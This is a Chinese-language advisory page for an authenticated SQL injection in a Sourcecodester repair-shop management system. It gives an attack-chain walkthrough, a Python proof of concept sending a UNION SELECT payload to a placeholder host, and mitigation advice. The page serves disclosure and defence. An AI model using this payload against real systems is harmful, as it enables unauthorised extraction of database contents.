CVE-2026-36943 CVSS 2.7 低危

CVE-2026-36943 电脑维修店管理系统SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36943

漏洞类型

SQL注入

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Sourcecodester Computer and Mobile Repair Shop Management System

漏洞概述

Sourcecodester Computer and Mobile Repair Shop Management System v1.0版本被发现存在安全漏洞。该漏洞位于/rsms/admin/repairs/manage_repair.php文件中，由于对用户输入缺乏有效的过滤，导致攻击者可以利用SQL注入漏洞获取敏感信息。虽然CVSS评分仅为2.7（低危），但该漏洞需要高权限用户才能触发，且主要影响数据的机密性。

技术细节

该漏洞属于典型的SQL注入漏洞。其根本原因是开发人员在编写/rsms/admin/repairs/manage_repair.php文件时，直接将用户提交的HTTP请求参数拼接到了SQL查询语句中，而没有使用预编译语句或进行有效的安全过滤。攻击者利用此漏洞的前提是必须拥有系统的高权限账户（PR:H）。一旦具备权限，攻击者可以通过构造特定的SQL Payload（如单引号闭合、UNION查询等），欺骗数据库服务器执行攻击者指定的SQL命令。虽然CVSS评分较低，但这主要是因为需要高权限且仅影响机密性（C:L）。攻击者可以利用此漏洞提取数据库中的敏感信息，如用户哈希、系统配置等，为进一步的内网渗透或权限提升提供数据支持。

攻击链分析

STEP 1

步骤1：信息收集与认证

攻击者首先需要确定目标系统使用的是Sourcecodester Computer and Mobile Repair Shop Management System v1.0，并获取管理员或高权限账户的登录凭证。

STEP 2

步骤2：访问漏洞点

利用获取的高权限凭证登录后台管理系统，导航至/rsms/admin/repairs/manage_repair.php页面。

STEP 3

步骤3：构造并发送恶意请求

在manage_repair.php页面的请求参数中（如ID或搜索字段），插入精心构造的SQL注入Payload（例如UNION SELECT语句）。

STEP 4

步骤4：数据提取

后端数据库执行恶意SQL语句，将查询结果（如数据库版本、表结构、敏感数据）返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-36943 SQL Injection
# Target: /rsms/admin/repairs/manage_repair.php

import requests

target_url = "http://target.com/rsms/admin/repairs/manage_repair.php"

# Note: High privileges (PR:H) are required, so valid cookies/session are needed.
cookies = {
    "PHPSESSID": "valid_admin_session_id"
}

# Example payload to test for SQL Injection (Assuming parameter 'id' exists)
payload = {
    "id": "1' UNION SELECT 1, 2, database(), version()-- -"
}

try:
    response = requests.get(target_url, params=payload, cookies=cookies, timeout=10)
    if response.status_code == 200:
        # Check if database error or data is reflected in response
        if "syntax error" in response.text or "mysql" in response.text.lower():
            print("[+] Potential SQL Injection vulnerability detected!")
        else:
            print("[+] Request sent, manually verify response for data leakage.")
    else:
        print("[-] Target unreachable or returned non-200 status.")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Sourcecodester Computer and Mobile Repair Shop Management System v1.0

防御指南

临时缓解措施

在官方补丁发布前，建议管理员检查并修改相关代码逻辑，确保所有数据库查询都使用了预编译技术。此外，应加强后台管理系统的身份验证机制，如启用多因素认证（MFA），防止因凭证泄露导致的高权限账户被滥用。如果可能，限制管理后台仅允许内网或特定IP地址访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表